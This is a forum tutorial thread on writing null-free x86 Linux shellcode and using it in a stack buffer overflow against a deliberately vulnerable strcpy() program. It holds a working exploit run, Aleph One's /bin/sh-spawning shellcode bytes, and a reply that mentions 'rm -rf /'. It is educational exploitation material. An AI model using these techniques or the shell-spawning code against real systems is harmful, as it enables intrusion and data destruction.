#1
Here's a tutorial that I put together to try and encourage people to get started with assembly and exploitation. If there are any errors, please post here and I'll edit them ASAP.
The path to shellcode
=====================

In this tutorial, I will teach you the basics of assembly needed to build your own shellcode. Assembly is quite a misunderstood language, and people always believe that it's harder than it actually is! Here's a little overview of what assembly really does, though:

Assembly is programming a machine at the lowest level possible (no compilers, etc.) without going into the 0's and 1's. It's all about thinking about how you arrange your memory, etc. It's quite easy to do, really.

The object of the tutorial will be to exploit the following program.
Code:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char *argv[]){
    char buffer[5]; /* deliberately tiny buffer */
    if(argc<2){
        printf("Usage: %s <text>\n",argv[0]);
        exit(0);
    }
    strcpy(buffer,argv[1]); /* no length check: this is the bug */
    printf("%s\n",buffer);
    return 0;
}
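For contrast with the strcpy() call in the program above, here is a minimal sketch of a copy that checks the length first. The helper name copy_checked is made up for this illustration and is not part of bug.c; it only shows the kind of check that strcpy() leaves out.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper (not part of bug.c): copy src into dst only if it
 * fits, including the terminating '\0'. Returns 0 on success, or -1 if
 * src is too long, in which case dst is left as an empty string. */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;

    len = strlen(src);
    if (len >= dst_size) {      /* no room for the text plus '\0' */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);  /* copies the '\0' as well */
    return 0;
}
```

With a 5-byte buffer, "Bob." (4 characters plus the terminator) fits exactly, while anything longer is refused instead of being written past the end of the array.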
$ gcc -g bug.c -o bug
$ ./bug Bob.
Bob.
$

This will compile and test the program. The part that makes this program exploitable is the strcpy() function: it does not check that the source string fits in the destination. In this tutorial we will make use of this fact by building a big string in argv[1], which strcpy() will copy into the tiny (5-byte) character array, writing past its end.

In this tutorial we will be covering the Intel assembly syntax and using nasm. There are other syntaxes, e.g. AT&T, and all can be used for shellcode; which one you choose to learn is down to taste. The basic syntax for an assembly instruction is the following:
Code:
instruction argument(, argument)
Code:
mov - Takes two arguments. The first is the destination, the second is the source. It copies the source's value into the destination.
inc - Takes just one argument. It increases the argument's value by one and stores the result back in the same place.
dec - The same as inc, but decreases the argument's value by one.
push - A stack instruction. There is only one argument, the source. It 'pushes' the source's value onto the top of the stack.
pop - Another stack instruction. It 'pops' the value off the top of the stack into the location given by its only argument.
call - Calls a function. It pushes the address of the next instruction (the return address) onto the stack, then jumps execution to the address supplied as an argument.
ret - Returns from a function. It pops the return address from the stack and jumps execution to there.
xor - Takes two arguments. It performs a bitwise exclusive 'or' of the two operands and stores the result in the first.
int - This is the instruction that puts all of this together. It stands for interrupt. It takes one argument, the interrupt number, and different numbers call different parts of the system. In this example we will be using 'int 80h', as it is the interrupt that calls the Linux kernel to carry out our system call.

Here is an example demonstrating the syntax of assembly.
example.s
Code:
mov eax,4 ; move '4' into eax.
inc eax ; increase eax by one, i.e., to 5.
call randomFunction ; call the function randomFunction.
push eax ; push eax's value onto the stack.
pop edx ; pop the value off the top of the stack into edx.
xor eax,edx ; xor the values of eax and edx. This leaves 0 in eax, as both values are the same.

Now it's time to take our second step into learning assembly, and write a program.

Hello World!

This program, being our first, will follow a traditional pattern: it's going to do nothing but print "Hello, world!". So, how do we go about doing this? Well, in the Linux kernel there is an array of system calls, each with its own number. We need to copy the appropriate number for a call that writes to STDOUT (standard output, i.e., your console window). The next question is: where do we copy it to?

In assembly, the answer is the CPU's registers. The first four are EAX, EBX, ECX, and EDX. These are called the accumulator, base, counter, and data registers. They are used for a wide range of things, but mainly they are temporary variables that are used when executing machine instructions.

The next four are ESP, EBP, ESI, and EDI. They are also general purpose registers, but are sometimes called pointers and indexes. They are the Stack Pointer, Base Pointer, Source Index, and Destination Index, respectively. The first two are referred to as pointers because they contain 32-bit memory addresses, pointing to a location in memory. The last two are also technically pointers, used to point to the source and destination when data needs to be read from or written to.

The last is the EIP register, the instruction pointer, which points to the instruction the CPU is executing. It is akin to a child pointing at a word as it reads.

In this tutorial we will only need EAX, EBX, ECX, and EDX, but it can be helpful in assembly to understand the others. For a system call made with 'int 80h', the EAX register holds the number of the system call we want to use, and EBX, ECX, and EDX hold its first, second, and third arguments.

Now, just before we write our program, we need to look at segments in memory. The ones we will be using in the following example are .data and .text. The .data segment stores the variables, and .text holds the machine code. And now, some assembly!
hello.s
Code:
section .data ; the .data segment, for variables.
msg db "Hello, world!", 0ah ; this stores our string and a newline character at 'msg'.

section .text ; now in the text segment.
global _start ; _start is the default entry point for ELF linking; exporting it tells the linker where execution begins.

_start: ; the entry point label the linker looks for.
; SYSCALL 4: write(int fd, const void *buffer, size_t count);
mov eax,4 ; 4 is the syscall number for write. This is what we will use to write to the STDOUT file descriptor.
mov ebx,1 ; put 1 into ebx. This is the file descriptor for STDOUT.
mov ecx,msg ; put the address of 'msg' into ecx.
mov edx,14 ; put the length of the string plus the newline char into edx.
int 80h ; call the kernel to run the above!

; SYSCALL 1: exit(0)
mov eax,1 ; put exit's syscall number into eax.
mov ebx,0 ; return 0 upon exit.
int 80h

twitch@home:~ $ nasm -f elf hello.s
twitch@home:~ $ ld hello.o
twitch@home:~ $ ./a.out
Hello, world!
twitch@home:~ $

So, our program worked. I'd recommend taking out all the comments from the above code and looking at it then; it's a lot cleaner. Unfortunately, our code will not work as shellcode. The problems are as follows:

- Shellcode is not a linked executable. It is injected into a program that is already running, so it has no .data segment of its own and cannot rely on fixed addresses such as 'msg'.
- We also cannot have null bytes! strcpy() stops copying at the first null byte, so anything after it would never reach the buffer.

To check for null bytes, we assemble the program in a different way.

==========
twitch@home:~ $ nasm hello.s
twitch@home:~ $ hexdump -C hello | grep --color=auto 00
[ OUTPUT TRIMMED ]
==========

This will show us a lot of null bytes within the code. We will have to remove these, but first let's rewrite our code in a shellcode-suitable form.
hello2.s
Code:
BITS 32
call mark_below ; pushes the address of the string below, then jumps over it.
db "Hello, World!",0x0a,0x0d
mark_below:
; ssize_t write(int fd, const void *buf, size_t count);
pop ecx ; pop the return address (the string pointer) into ecx
mov eax,4 ; 4 is the syscall number for write.
mov ebx,1 ; STDOUT
mov edx,15 ; length of string
int 80h ; do the system call
; void _exit(int status)
mov eax,1 ; 1 is exit's syscall number
mov ebx,0 ; return 0
int 80h ; do the system call

$ nasm hello2.s
$ hexdump -C hello2 | grep --color=auto 00

There are still plenty of null bytes in our code. It can be tested out, but it will not work as shellcode. In the output from hexdump, you will see a run of 00 bytes near the start. Using gdb, these can be shown to belong to our call instruction: the call jumps forward a short distance, so its 32-bit offset is a small positive number whose upper bytes are all zero. We need to sort that out, along with the 'mov' instructions that load small numbers into full 32-bit registers. Here is our modified code.
hello3.s
Code:
BITS 32
jmp short one ; jump down to 'one', which will call 'two'.
two:
; ssize_t write(int fd, const void *buf, size_t count);
pop ecx ; pop the string pointer from the stack
xor eax,eax ; zero out eax, as 'mov al' only sets the low byte
mov al,4 ; put 4 into AL
xor ebx,ebx ; XORing ebx with itself gives 0.
inc ebx ; increase ebx by one (STDOUT)
xor edx,edx ; zero out edx
mov dl,15 ; put 15 (the string length) into DL
int 80h ; call the kernel
mov al,1 ; put 1 into AL for exit
dec ebx ; decrease ebx to 0 (return code)
int 80h ; call the kernel.
one:
call two ; pushes the address of the string and jumps back up to 'two'.
db "Hello, world!", 0x0a, 0x0d ; no terminating 0 needed: write() is given the length

$ nasm hello3.s
$ hexdump -C hello3 | grep --color=auto 00

Look! No NULL bytes! Excellent, this will do very nicely. But why did it work? Our shellcode now is quite different from before, but it should be readable to you. It incorporates most of the instructions in the initial example!

The call no longer produces null bytes because it now jumps backwards: a negative offset is stored with ff bytes in its upper bytes instead of 00, and the 'jmp short' at the top only needs a one-byte offset.

The only other thing that ought to be confusing you is the 'mov al,4' line. What is AL? Well, years back, computers used to only have 16-bit registers. That meant there was AX as the whole accumulator register, with AL as the lower 8 bits and AH as the higher 8 bits. Now, with 32-bit processors, we have EAX, but we can still use AX, AL, and AH if we choose. The REASON for using AL is that it is big enough to hold the integer '4', so the instruction is encoded with a single byte of data instead of four, which avoids the null bytes that are brought in when we use EAX. Because 'mov al,4' only changes the low byte, we clear the whole register first with 'xor eax,eax'.

Now, it's time to exploit our program!

Running the exploit

Now that we have our shellcode sorted out, we need to find somewhere to hold it. To make use of a good trick, we will use environment variables. These are useful when the buffer we are overflowing is small: we put the shellcode in an environment variable and overflow the buffer with the address of that variable. Here is a program that will tell us the location of an environment variable in memory:
getenvaddr.c
Code:
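#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[]){
    char *ptr;
    if(argc < 3){
        printf("Usage: %s <environment variable> <target program>\n",argv[0]);
        exit(0);
    }
    ptr = getenv(argv[1]); /* where the variable lives in this process */
    if(ptr == NULL){
        printf("%s is not set\n",argv[1]);
        exit(1);
    }
    /* the program name is also stored on the stack, so adjust for the
       difference in length between our name and the target's name */
    ptr += ((int)strlen(argv[0]) - (int)strlen(argv[2]))*2;
    printf("%s will be at %p\n",argv[1],(void *)ptr);
    return 0;
}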
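Now we put the shellcode into an environment variable, look up where it will be in memory, and overflow the buffer by writing the memory address out a number of times. Note that the bytes of the address are given in reverse (little-endian) order.

$ nasm hello3.s
$ export SHELLCODE=`cat hello3`
$ ./getenvaddr SHELLCODE ./bug
SHELLCODE will be at 0xbfffff0c
$ ./bug `perl -e 'print "\x0c\xff\xff\xbf"x100;'`
Hello, world!
$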
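To make the byte order in that perl string concrete, here is a rough sketch in C of how a 32-bit address is laid out least significant byte first and repeated back to back. The function name repeat_address_le is made up for this illustration, and the address 0xbfffff0c is just the one from the session above; yours will differ.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: fill buf with `count` back-to-back copies of a
 * 32-bit address in little-endian order (least significant byte first),
 * which is the byte order x86 uses. Returns the number of bytes written,
 * or 0 if buf is NULL or too small. */
size_t repeat_address_le(unsigned char *buf, size_t buf_size,
                         uint32_t addr, size_t count)
{
    size_t i;

    if (buf == NULL || count > buf_size / 4)
        return 0;

    for (i = 0; i < count; i++) {
        buf[4 * i + 0] = (unsigned char)(addr & 0xff);
        buf[4 * i + 1] = (unsigned char)((addr >> 8) & 0xff);
        buf[4 * i + 2] = (unsigned char)((addr >> 16) & 0xff);
        buf[4 * i + 3] = (unsigned char)((addr >> 24) & 0xff);
    }
    return count * 4;
}
```

Called with 0xbfffff0c and a count of 100, this fills 400 bytes with 0c ff ff bf repeated, the same bytes the perl one-liner prints.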
__________________
Twitch`
#2
Very good! Could you define shellcode? I always thought of it as something like
#!/bin/bash
rm -rf /
or some such thing!
#3
Yeah, no bother!
It's basically raw machine code, written out as hex bytes, that doesn't depend on any other file or process in the OS. It's code that will run without including other files, etc. Typically its use is in the exploitation of programs. It got the name because usually, when exploiting a vulnerability, the purpose of the code would be to spawn a shell, so "shellcode" followed as a name. Here's an example from Aleph One's "Smashing the Stack for Fun and Profit".

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

When you assemble the shellcode (or compile it from C), it's turned into machine code bytes, which are usually shown in hex. For example,
(1) mov eax,4 will be assembled into "b8 04 00 00 00"
(2) mov al,4 will be assembled into "b0 04"
But if you just typed "b0 04" into a string, it would be treated as plain ASCII characters, so you need the \x prefix to say that each pair of digits is the hexadecimal value of a single byte. So, mov al,4 is assembled into "b0 04", and when we write it as shellcode, it's "\xb0\x04".
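As a small sketch of the two points above, the following C helpers count the null bytes in a block of assembled bytes and write the bytes out in the "\x" form. The names count_null_bytes and to_hex_escapes are made up for this illustration; the byte values are the two 'mov' encodings just mentioned.

```c
#include <stddef.h>
#include <stdio.h>

/* Count the 0x00 bytes in a block of assembled code. */
size_t count_null_bytes(const unsigned char *code, size_t len)
{
    size_t i, nulls = 0;

    for (i = 0; i < len; i++)
        if (code[i] == 0x00)
            nulls++;
    return nulls;
}

/* Write each byte as a "\xNN" escape into out. Returns 0 on success,
 * or -1 if out is too small (4 characters per byte plus the '\0'). */
int to_hex_escapes(const unsigned char *code, size_t len,
                   char *out, size_t out_size)
{
    size_t i;

    if (out_size < len * 4 + 1)
        return -1;
    for (i = 0; i < len; i++)
        snprintf(out + 4 * i, 5, "\\x%02x", code[i]);
    out[len * 4] = '\0';
    return 0;
}
```

Given the bytes b8 04 00 00 00 for 'mov eax,4', count_null_bytes reports three nulls; given b0 04 for 'mov al,4', it reports none, and to_hex_escapes produces the text \xb0\x04.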
__________________
Twitch`